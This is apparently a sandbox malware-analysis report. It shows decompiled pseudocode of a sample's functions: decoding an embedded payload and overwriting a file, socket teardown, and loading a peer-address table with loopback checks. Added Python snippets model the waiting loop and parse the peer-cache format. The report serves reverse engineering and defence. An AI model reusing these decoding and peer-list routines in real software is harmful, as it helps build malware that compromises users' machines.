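    """threading.Event stands in for a waitable handle; set == signaled."""
    ev = threading.Event()
    if signaled:
        ev.set()
    return ev


def wait_all(group, timeout_ms=INFINITE):
    """True once every slot is NULL or signaled, False when the countdown expires.
    A NULL group or an empty one (count <= 0) returns False without polling."""
    if group is None or group.count <= 0:
        return False
    countdown_enabled = timeout_ms != INFINITE      # _v17 = (_a8 != 0xffffffff)
    remaining = timeout_ms
    while True:
        done = 0
        with group.lock:
            for h in group.handles[:group.count]:
                # WaitForSingleObject(h, 0) == WAIT_OBJECT_0: the neg/sbb/inc sequence turns
                # that 0 into +1 and any other status into +0; NULL slots are counted as done.
                if h is None or h.is_set():
                    done += 1
        if done == group.count:
            return True
        if countdown_enabled:
            # One decrement per poll with 32-bit wraparound, exactly as the DWORD in the
            # original: a timeout of 0 therefore means ~2^32 polls, not "return at once".
            remaining = (remaining - 1) & 0xFFFFFFFF
            if remaining == 0:
                return False
        time.sleep(0.001)   # Sleep(1): elapsed time is at least timeout_ms, usually more


def demo():
    """Three workers finishing at different times; wait_all returns True once all are done."""
    events = [threading.Event() for _ in range(3)]
    for i, ev in enumerate(events):
        threading.Timer(0.005 * (i + 1), ev.set).start()
    return wait_all(WaitGroup(events), timeout_ms=5000)
```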

                                                                                  C-Code - Quality: 83%
                                                                                  			E0040D580(WCHAR* _a4) {
                                                                                  				void* _v8;
                                                                                  				long _v12;
                                                                                  				void* _v16;
                                                                                  				DWORD* _v20;
                                                                                  				char _v21;
                                                                                  				void* _v28;
                                                                                  				void* _v32;
                                                                                  				char _v48;
                                                                                  				DWORD* _t70;
                                                                                  				void* _t73;
                                                                                  				void* _t103;
                                                                                  
                                                                                  				_v21 = 0;
                                                                                  				_v12 = 0;
                                                                                  				_v20 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_v16 = CreateFileW(_a4, 0x80000000, 0, 0, 3, 0, 0); // GENERIC_READ, OPEN_EXISTING
                                                                                  				if(_v16 == 0xffffffff) { // INVALID_HANDLE_VALUE
                                                                                  					L12:
                                                                                  					if(_v8 != 0) {
                                                                                  						_v16 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0, 0); // GENERIC_WRITE, CREATE_ALWAYS: the same path is overwritten with the decoded buffer
                                                                                  						if(_v16 != 0xffffffff) {
                                                                                  							_v21 = 1;
                                                                                  							WriteFile(_v16, _v8, _v12,  &_v12, 0);
                                                                                  							CloseHandle(_v16);
                                                                                  						}
                                                                                  						E00408FB0(_v8); // release the decoded buffer
                                                                                  					}
                                                                                  					return _v21;
                                                                                  				}
                                                                                  				_v28 = CreateFileMappingW(_v16, 0, 2, 0, 0, 0); // PAGE_READONLY
                                                                                  				if(_v28 == 0) {
                                                                                  					L11:
                                                                                  					CloseHandle(_v16);
                                                                                  					goto L12;
                                                                                  				}
                                                                                  				_v32 = MapViewOfFile(_v28, 4, 0, 0, 0); // FILE_MAP_READ
                                                                                  				if(_v32 == 0) {
                                                                                  					L10:
                                                                                  					CloseHandle(_v28);
                                                                                  					goto L11;
                                                                                  				} else {
                                                                                  					_v12 = GetFileSize(_v16, 0);
                                                                                  					if(_v12 > 0x100) { // only files larger than a 0x100-byte header
                                                                                  						_t70 = E0040B4C0(_v32, _v32); // locate/validate the header in the mapping; NULL on failure
                                                                                  						_t103 = _t103 + 4;
                                                                                  						_v20 = _t70;
                                                                                  						if(_v20 != 0 && _v20[6] == _v12 - 0x100) { // length field at header+0x18 must equal the payload size
                                                                                  							_v12 = _v20[6];
                                                                                  							_t73 = E0040AE60(_v32 + 0x100,  &(_v20[2]), 0x10, _v32 + 0x100, _v12); // decode the payload at +0x100 with the 16-byte key at header+8
                                                                                  							_t103 = _t103 + 0x10;
                                                                                  							_v8 = _t73;
                                                                                  							if(_v8 != 0) {
                                                                                  								E00409800(_v8, _v12,  &_v48); // 16-byte digest of the decoded buffer into _v48
                                                                                  								_t103 = _t103 + 0xc;
                                                                                  								asm("repe cmpsd"); // compare four dwords of _v48 with a header field
                                                                                  								if(0 != 0) { // the decompiler dropped the flag test; read as the mismatch branch: discard the buffer, write nothing
                                                                                  									E00408FB0(_v8);
                                                                                  									_t103 = _t103 + 4;
                                                                                  									_v8 = 0;
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  					UnmapViewOfFile(_v32);
                                                                                  					goto L10;
                                                                                  				}
                                                                                  			}


                                                                                  Instruction addresses (per-line address column for the pseudocode above; 0x00000000 marks lines with no instruction): 0x0040d588 0x0040d58c 0x0040d593 0x0040d59a 0x0040d5ba 0x0040d5c1 0x0040d6d3 0x0040d6d7 0x0040d6f2 0x0040d6f9 0x0040d6fb 0x0040d711 0x0040d71b 0x0040d71b 0x0040d725 0x0040d72a 0x0040d735 0x0040d735 0x0040d5db 0x0040d5e2 0x0040d6c9 0x0040d6cd 0x00000000 0x0040d6cd 0x0040d5fa 0x0040d601 0x0040d6bf 0x0040d6c3 0x00000000 0x0040d607 0x0040d613 0x0040d61d 0x0040d627 0x0040d62c 0x0040d62f 0x0040d636 0x0040d64f 0x0040d669 0x0040d66e 0x0040d671 0x0040d678 0x0040d686 0x0040d68b 0x0040d69e 0x0040d6a0 0x0040d6a6 0x0040d6ab 0x0040d6ae 0x0040d6ae 0x0040d6a0 0x0040d678 0x0040d636 0x0040d6b9 0x00000000 0x0040d6b9

                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040D5B4
                                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040D5D5
                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040D5F4
                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D60D
                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040D6B9
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040D6C3
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040D6CD
                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040D6EC
                                                                                  • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040D711
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040D71B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWrite
                                                                                  • String ID:
                                                                                  • API String ID: 171974401-0
                                                                                  • Opcode ID: 0f9f188c6dc80e39ad04ba57d57415bc9a5561ea4dd1a5a43cd4d3438c38bcb4
                                                                                  • Instruction ID: abd0401628c18b29deb1849a45b8fcca8b7b44c39020343394329d6e44a62b50
                                                                                  • Opcode Fuzzy Hash: 0f9f188c6dc80e39ad04ba57d57415bc9a5561ea4dd1a5a43cd4d3438c38bcb4
                                                                                  • Instruction Fuzzy Hash: 06514DB5E00208FBDB14DFE4CC49BEEB775AB48704F108569E615772C0D7B96A84CB98
                                                                                  Uniqueness
                                                                                  • Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 79%
                                                                                  			E0040EBE0(void* __eax, long __ebx, void* __ecx, short _a4, short _a6) {
                                                                                  				long _v4;
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				intOrPtr _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				char _v28;
                                                                                  				void* __esi;
                                                                                  				intOrPtr _t59;
                                                                                  				intOrPtr _t64;
                                                                                  				void* _t73;
                                                                                  				void* _t106;
                                                                                  				void* _t108;
                                                                                  
                                                                                  				_t108 = __eax;
                                                                                  				_t106 = __ecx;
                                                                                  				if(_a4 != 0 || __ebx == 0) {
                                                                                  					InterlockedDecrement(_t108 + 0x14);
                                                                                  					_a4 = 1;
                                                                                  					_t59 =  *((intOrPtr*)(_t106 + 0x260));
                                                                                  					 *((char*)(_t106 + 0x275)) = 1;
                                                                                  					_a6 = 0;
                                                                                  					__imp__#21(_t59, 0xffff, 0x80,  &_a4, 4);
                                                                                  					__imp__#3( *((intOrPtr*)(_t106 + 0x260)));
                                                                                  					 *((intOrPtr*)(_t106 + 0x260)) = 0xffffffff;
                                                                                  					return _t59;
                                                                                  				}
                                                                                  				InterlockedExchange(_t106 + 4, E0040C210());
                                                                                  				_t64 =  *((intOrPtr*)(_t108 + 0x18));
                                                                                  				if(_t64 == 0) {
                                                                                  					if( *((char*)(_t106 + 0x275)) == 0) {
                                                                                  						 *((intOrPtr*)(_t108 + 0x28)) =  *((intOrPtr*)(_t108 + 0x28)) + __ebx;
                                                                                  						if( *((intOrPtr*)(_t108 + 0x28)) >=  *((intOrPtr*)(_t108 + 0x24))) {
                                                                                  							InterlockedDecrement(_t108 + 0x14);
                                                                                  							_v24 =  *((intOrPtr*)(_t106 + 0x268));
                                                                                  							_v20 =  *((intOrPtr*)(_t106 + 0x26c));
                                                                                  							_v12 =  *((intOrPtr*)(_t106 + 0x278));
                                                                                  							_v28 =  *((intOrPtr*)(_t106 + 0x264));
                                                                                  							_v8 =  *((intOrPtr*)(_t108 + 0x30));
                                                                                  							_v16 =  *((intOrPtr*)(_t106 + 0x270));
                                                                                  							_v4 =  *((intOrPtr*)(_t108 + 0x28));
                                                                                  							return E0040E5C0(2, _t106,  *((intOrPtr*)(_t106 + 0x27c)),  &_v28);
                                                                                  						} else {
                                                                                  							 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t108 + 0x20)) + __ebx;
                                                                                  							 *((intOrPtr*)(_t108 + 0x1c)) =  *((intOrPtr*)(_t108 + 0x1c)) - __ebx;
                                                                                  							_push(_t106);
                                                                                  							return E0040E960(_t108);
                                                                                  						}
                                                                                  					} else {
                                                                                  						return InterlockedDecrement(_t108 + 0x14);
                                                                                  					}
                                                                                  				} else {
                                                                                  					_t73 = _t64 - 1;
                                                                                  					if(_t73 != 0) {
                                                                                  						L14:
                                                                                  						return _t73;
                                                                                  					} else {
                                                                                  						if( *((intOrPtr*)(_t106 + 0x275)) == _t73) {
                                                                                  							InterlockedDecrement(_t106 + 0x21c);
                                                                                  							InterlockedExchangeAdd( *((intOrPtr*)(_t106 + 0x27c)) + 0x44, __ebx);
                                                                                  							_v28 =  *((intOrPtr*)(_t106 + 0x264));
                                                                                  							_v24 =  *((intOrPtr*)(_t106 + 0x268));
                                                                                  							_v16 =  *((intOrPtr*)(_t106 + 0x270));
                                                                                  							_v20 =  *((intOrPtr*)(_t106 + 0x26c));
                                                                                  							_v12 =  *((intOrPtr*)(_t106 + 0x278));
                                                                                  							_v8 = _t106 + 8;
                                                                                  							_v4 = __ebx;
                                                                                  							E0040E5C0(3, _t106,  *((intOrPtr*)(_t106 + 0x27c)),  &_v28);
                                                                                  							_t73 = E0040EB70(_t106);
                                                                                  							if(_t73 != 0) {
                                                                                  								goto L14;
                                                                                  							} else {
                                                                                  								 *((char*)(_t106 + 0x275)) = 1;
                                                                                  								return _t73;
                                                                                  							}
                                                                                  						} else {
                                                                                  							return InterlockedDecrement(_t106 + 0x21c);
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  			}

                                                                                  APIs
                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 0040EC06
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040EC30
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040EC43
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,?), ref: 0040EC54
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040ECDB
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040ED76
                                                                                  • setsockopt.WS2_32 ref: 0040EDAC
                                                                                  • closesocket.WS2_32(?), ref: 0040EDB9
                                                                                    • Part of subcall function 0040C210: NtQuerySystemTime.NTDLL ref: 0040C21A
                                                                                    • Part of subcall function 0040C210: RtlTimeToSecondsSince1980.NTDLL ref: 0040C228
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                  • String ID:
                                                                                  • API String ID: 671207744-0
                                                                                  • Opcode ID: eac7544d65530684678831c593fe10f9f5ab3dca7285b72a3d6bbcbf7238f9b5
                                                                                  • Instruction ID: a63a62e2eddc4c6ea33aec9a9dae6784646f40805859537cb5bfc137b0e9617d
                                                                                  • Opcode Fuzzy Hash: eac7544d65530684678831c593fe10f9f5ab3dca7285b72a3d6bbcbf7238f9b5
                                                                                  • Instruction Fuzzy Hash: CC51B175608702AFC704DF29D488B96FBE0BF88314F008A2EE49D83351D735A554CB95
                                                                                  Uniqueness
                                                                                  • Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00409D70(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                                                                  				signed char _v5;
                                                                                  				signed int _v12;
                                                                                  				signed int _v13;
                                                                                  				signed int _v20;
                                                                                  				signed char _t47;
                                                                                  				char* _t49;
                                                                                  				char* _t52;
                                                                                  				signed int _t56;
                                                                                  				void* _t60;
                                                                                  				char* _t63;
                                                                                  				signed int _t68;
                                                                                  				char* _t69;
                                                                                  				signed int _t71;
                                                                                  				signed int _t79;
                                                                                  				signed int _t81;
                                                                                  				intOrPtr _t83;
                                                                                  				char* _t85;
                                                                                  				void* _t87;
                                                                                  				void* _t88;
                                                                                  				void* _t90;
                                                                                  				void* _t94;
                                                                                  
                                                                                  				_t47 = E00409AB0(_a4);
                                                                                  				_t88 = _t87 + 4;
                                                                                  				_t65 = _t47 & 0x000000ff;
                                                                                  				if((_t47 & 0x000000ff) == 0) {
                                                                                  					_t49 = strstr(E00409820(_t65, _a4), "127.");
                                                                                  					_t90 = _t88 + 0xc;
                                                                                  					__eflags = _t49;
                                                                                  					if(_t49 == 0) {
                                                                                  						L6:
                                                                                  						EnterCriticalSection(0x414e4c);
                                                                                  						_v5 = 0;
                                                                                  						_v12 = 0;
                                                                                  						while(1) {
                                                                                  							__eflags = _v12 -  *0x414e84; // 0x0
                                                                                  							if(__eflags >= 0) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_t83 =  *((intOrPtr*)(0x414e88 + _v12 * 4));
                                                                                  							__eflags =  *((intOrPtr*)(_t83 + 4)) - _a4;
                                                                                  							if( *((intOrPtr*)(_t83 + 4)) != _a4) {
                                                                                  								_t85 = _v12 + 1;
                                                                                  								__eflags = _t85;
                                                                                  								_v12 = _t85;
                                                                                  								continue;
                                                                                  							}
                                                                                  							_t60 = E0040C210();
                                                                                  							_t50 = _t60 - _a8;
                                                                                  							 *((intOrPtr*)( *((intOrPtr*)(0x414e88 + _v12 * 4)) + 8)) = _t60 - _a8;
                                                                                  							_v5 = 1;
                                                                                  							break;
                                                                                  						}
                                                                                  						E00409CC0(_t50);
                                                                                  						_t52 = _v5 & 0x000000ff;
                                                                                  						__eflags = _t52;
                                                                                  						if(_t52 != 0) {
                                                                                  							L23:
                                                                                  							LeaveCriticalSection(0x414e4c);
                                                                                  							return _t52;
                                                                                  						}
                                                                                  						_v13 = 0;
                                                                                  						__eflags =  *0x414e84 - 0x200;
                                                                                  						if( *0x414e84 == 0x200) {
                                                                                  							_v13 = 1;
                                                                                  						}
                                                                                  						_t52 = E00408E40(0xc);
                                                                                  						_v20 = _t52;
                                                                                  						__eflags = _v20;
                                                                                  						if(_v20 == 0) {
                                                                                  							goto L23;
                                                                                  						} else {
                                                                                  							 *((intOrPtr*)(_v20 + 4)) = _a4;
                                                                                  							 *((intOrPtr*)(_v20 + 8)) = E0040C210() - _a8;
                                                                                  							__eflags = _v13 & 0x000000ff;
                                                                                  							if((_v13 & 0x000000ff) == 0) {
                                                                                  								_t79 =  *0x414e84; // 0x0
                                                                                  								_t55 = _v20;
                                                                                  								 *((intOrPtr*)(0x414e88 + _t79 * 4)) = _v20;
                                                                                  								_t68 =  *0x414e84; // 0x0
                                                                                  								_t69 = _t68 + 1;
                                                                                  								__eflags = _t69;
                                                                                  								 *0x414e84 = _t69;
                                                                                  								L21:
                                                                                  								_t52 = E00409CC0(_t55);
                                                                                  								__eflags = _a12 & 0x000000ff;
                                                                                  								if((_a12 & 0x000000ff) != 0) {
                                                                                  									_t52 = E004099A0(_t52);
                                                                                  								}
                                                                                  								goto L23;
                                                                                  							} else {
                                                                                  								goto L17;
                                                                                  							}
                                                                                  							while(1) {
                                                                                  								L17:
                                                                                  								_t56 =  *0x414e84; // 0x0
                                                                                  								__eflags =  *(0x414e84[_t56]);
                                                                                  								if( *(0x414e84[_t56]) == 0) {
                                                                                  									break;
                                                                                  								}
                                                                                  								Sleep(1);
                                                                                  							}
                                                                                  							_t81 =  *0x414e84; // 0x0
                                                                                  							 *(0x414e84[_t81]) = 1;
                                                                                  							_t71 =  *0x414e84; // 0x0
                                                                                  							E00408FB0(0x414e84[_t71]);
                                                                                  							_t55 =  *0x414e84; // 0x0
                                                                                  							0x414e84[_t55] = _v20;
                                                                                  							goto L21;
                                                                                  						}
                                                                                  					}
                                                                                  					_t63 = strstr(E00409820(_t65, _a4), ".127");
                                                                                  					_t94 = _t90 + 0xc;
                                                                                  					__eflags = _t63;
                                                                                  					if(_t63 == 0) {
                                                                                  						L5:
                                                                                  						return _t63;
                                                                                  					}
                                                                                  					_t63 = strstr(E00409820(_a4, _a4), ".127.");
                                                                                  					_t90 = _t94 + 0xc;
                                                                                  					__eflags = _t63;
                                                                                  					if(_t63 != 0) {
                                                                                  						goto L6;
                                                                                  					}
                                                                                  					goto L5;
                                                                                  				}
                                                                                  				return _t47;
                                                                                  			}

                                                                                  APIs
                                                                                    • Part of subcall function 00409AB0: gethostname.WS2_32(?,00000100), ref: 00409ACC
                                                                                    • Part of subcall function 00409AB0: gethostbyname.WS2_32(?), ref: 00409ADE
                                                                                  • strstr.NTDLL ref: 00409DA0
                                                                                  • strstr.NTDLL ref: 00409DBE
                                                                                  • strstr.NTDLL ref: 00409DDC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: strstr$gethostbynamegethostname
                                                                                  • String ID: .127$.127.$127.
                                                                                  • API String ID: 2540993189-1573993753
                                                                                  • Opcode ID: 8884d166f746be7126d4f476aea7d7a78fa78d4b36ab4e2f45a01bafcb5ad5fb
                                                                                  • Instruction ID: 183aa7514d5840da55b51ccb33f3d2103a3eb28b4696c2bac9d1f078e1a22ee6
                                                                                  • Opcode Fuzzy Hash: 8884d166f746be7126d4f476aea7d7a78fa78d4b36ab4e2f45a01bafcb5ad5fb
                                                                                  • Instruction Fuzzy Hash: F45190B4944306DBCB04EF64E8417AA7BB5BB84304F14803EE805A73D2E779ED80CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040A020() {
                                                                                  				void* _v8;
                                                                                  				signed int _v12;
                                                                                  				void* _v16;
                                                                                  				void* _v20;
                                                                                  				long _v24;
                                                                                  				DWORD* _v28;
                                                                                  				signed int _v32;
                                                                                  				intOrPtr _t41;
                                                                                  				void* _t74;
                                                                                  
                                                                                  				InitializeCriticalSection(0x414e4c);
                                                                                  				_v12 = 0;
                                                                                  				while(_v12 < 0x200) {
                                                                                  					E00409D70( *((intOrPtr*)(0x4133b8 + _v12 * 4)), E0040C210(), 0);
                                                                                  					_t74 = _t74 + 0xc;
                                                                                  					_v12 = _v12 + 1;
                                                                                  				}
                                                                                  				_v8 = CreateFileW(0x414c40, 0x80000000, 0, 0, 3, 0, 0);
                                                                                  				if(_v8 != 0xffffffff) {
                                                                                  					_v16 = CreateFileMappingW(_v8, 0, 2, 0, 0, 0);
                                                                                  					if(_v16 != 0) {
                                                                                  						_v20 = MapViewOfFile(_v16, 4, 0, 0, 0);
                                                                                  						if(_v20 != 0) {
                                                                                  							_v24 = GetFileSize(_v8, 0);
                                                                                  							_v28 = 0;
                                                                                  							_v32 = 0;
                                                                                  							while(_v28 < _v24 && _v32 < 0x200) {
                                                                                  								E00409D70( *((intOrPtr*)(_v20 + _v32 * 8)), E0040C210() -  *((intOrPtr*)(_v20 + 4 + _v32 * 8)), 0);
                                                                                  								_t74 = _t74 + 0xc;
                                                                                  								_v28 =  &(_v28[2]);
                                                                                  								_v32 = _v32 + 1;
                                                                                  							}
                                                                                  							UnmapViewOfFile(_v20);
                                                                                  						}
                                                                                  						CloseHandle(_v16);
                                                                                  					}
                                                                                  					CloseHandle(_v8);
                                                                                  				}
                                                                                  				E00409A90();
                                                                                  				_t41 =  *0x414e68; // 0x0
                                                                                  				return E0040BF50(_t41, 0, E00409960, 0, 0, 0);
                                                                                  			}
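Added example, not code from the sample, from Joe Sandbox or from this report: a stand-alone reader for the file that E0040A020 maps read-only and walks. The record layout is taken from the decompilation above: 8-byte records, a dword at +0 that is passed to E00409D70 as its first argument, a dword at +4 that is subtracted from E0040C210() (NtQuerySystemTime + RtlTimeToSecondsSince1980, i.e. whole seconds since 1980-01-01 UTC), and a hard cap of 0x200 records. Everything else is an assumption and is labelled as such in the code: the path stored at 0x414c40 is not recovered here, the first dword is treated as an IPv4 address only because E00409D70 runs strstr checks for ".127" / ".127." on its string form, and where the sample bounds the loop on byte offset < file size alone, this reader stops at the last complete record instead of reading a trailing partial one. The sample input is constructed, not a capture.

```python
"""Reader for the 8-byte (dword, seconds-since-1980) records that E0040A020
maps and feeds to E00409D70. Added example, not the sample's own code.
ASSUMPTIONS: file path unknown (0x414c40 not recovered); first dword
treated as an IPv4 address in network byte order (inferred from the '.127'
strstr checks in E00409D70, not confirmed by the report)."""
import socket
import struct
from datetime import datetime, timedelta, timezone

RECORD = struct.Struct("<4sI")   # 4 raw bytes at +0, little-endian dword at +4
MAX_ENTRIES = 0x200              # loop bound _v32 < 0x200 in E0040A020
EPOCH_1980 = datetime(1980, 1, 1, tzinfo=timezone.utc)


def seconds_since_1980(when: datetime) -> int:
    """Mirror RtlTimeToSecondsSince1980: whole seconds since 1980-01-01 UTC."""
    return int((when - EPOCH_1980).total_seconds())


def parse_peer_cache(data: bytes, now: datetime) -> list:
    """Walk the file the way E0040A020 does: 8-byte records from offset 0,
    stop when the offset reaches the file size or 0x200 records were read.
    For each record return the raw dword as the sample reads it, the
    ASSUMED dotted IPv4 form, the stored timestamp, and the age that the
    sample passes to E00409D70 as E0040C210() - stored_timestamp."""
    now_1980 = seconds_since_1980(now)
    records = []
    offset = 0
    # The sample only checks offset < file size before each read; a file
    # whose size is not a multiple of 8 would make it read a partial last
    # record. This reader requires a full record instead.
    while offset + RECORD.size <= len(data) and len(records) < MAX_ENTRIES:
        raw, stamp = RECORD.unpack_from(data, offset)
        records.append({
            "value": int.from_bytes(raw, "little"),      # dword as the x86 code sees it
            "ipv4_assumed": socket.inet_ntoa(raw),       # ASSUMPTION: IPv4, network order
            "timestamp_1980": stamp,
            "stored_at": EPOCH_1980 + timedelta(seconds=stamp),
            "age_seconds": now_1980 - stamp,
        })
        offset += RECORD.size
    return records


def build_sample_cache(entries, now: datetime) -> bytes:
    """Constructed test input (not a real capture): (dotted_ip, age_seconds)
    pairs serialised in the layout the decompilation shows."""
    now_1980 = seconds_since_1980(now)
    return b"".join(RECORD.pack(socket.inet_aton(ip), now_1980 - age)
                    for ip, age in entries)


# Constructed sample: three records plus two trailing junk bytes to show the
# partial-record handling. The addresses are documentation ranges.
SAMPLE_NOW = datetime(2022, 8, 1, 12, 0, 0, tzinfo=timezone.utc)
SAMPLE_ENTRIES = [("192.0.2.10", 60), ("198.51.100.7", 3600), ("127.0.0.1", 5)]
SAMPLE_CACHE = build_sample_cache(SAMPLE_ENTRIES, SAMPLE_NOW) + b"\xaa\xbb"


if __name__ == "__main__":
    for rec in parse_peer_cache(SAMPLE_CACHE, SAMPLE_NOW):
        print(f"{rec['ipv4_assumed']:>15}  stored {rec['stored_at']:%Y-%m-%d %H:%M:%S}  "
              f"age {rec['age_seconds']}s  raw 0x{rec['value']:08x}")
```

The "age_seconds" column is the quantity E0040A020 hands to E00409D70 as its second argument; the first loop in that function, over the 0x200-entry table at 0x4133b8, passes E0040C210() with no subtraction, so those built-in entries arrive with age equal to the current time rather than zero. Whether E00409D70 then rejects entries whose dotted form contains ".127." cannot be settled from the truncated listing above, so no such filter is applied here.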

                                                                                  APIs
                                                                                  • InitializeCriticalSection.KERNEL32(00414E4C,?,?,?,?,?,?,004068A0), ref: 0040A02B
                                                                                  • CreateFileW.KERNEL32(00414C40,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040A07D
                                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040A09E
                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040A0BD
                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040A0D2
                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040A138
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A142
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040A14C
                                                                                    • Part of subcall function 0040C210: NtQuerySystemTime.NTDLL ref: 0040C21A
                                                                                    • Part of subcall function 0040C210: RtlTimeToSecondsSince1980.NTDLL ref: 0040C228
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                  • String ID:
                                                                                  • API String ID: 439099756-0
                                                                                  • Opcode ID: 97191d7563d11220bb9c43c848a5229161b8639f145c7d4a366d64e3fea0f839
                                                                                  • Instruction ID: acc5326b5384c580b36ed7733cff79295e061d02a32601855545f98bc6dcfb13
                                                                                  • Opcode Fuzzy Hash: 97191d7563d11220bb9c43c848a5229161b8639f145c7d4a366d64e3fea0f839
                                                                                  • Instruction Fuzzy Hash: 4D413A74E40308ABDB10DFA4CC4ABAEB774BB44704F208569E6117B2C1C6B96A51CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00404200() {
                                                                                  				void* _v8;
                                                                                  				void* _v12;
                                                                                  				void* _v16;
                                                                                  				long _v20;
                                                                                  				void* _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				void* _t35;
                                                                                  				intOrPtr _t45;
                                                                                  				void* _t66;
                                                                                  				void* _t67;
                                                                                  
                                                                                  				InitializeCriticalSection(0x4143f0);
                                                                                  				_t35 = CreateFileW(0x414620, 0x80000000, 0, 0, 3, 0, 0);
                                                                                  				_v8 = _t35;
                                                                                  				if(_v8 != 0xffffffff) {
                                                                                  					_v12 = CreateFileMappingW(_v8, 0, 2, 0, 0, 0);
                                                                                  					if(_v12 == 0) {
                                                                                  						L14:
                                                                                  						return CloseHandle(_v8);
                                                                                  					}
                                                                                  					_v16 = MapViewOfFile(_v12, 4, 0, 0, 0);
                                                                                  					if(_v16 == 0) {
                                                                                  						L13:
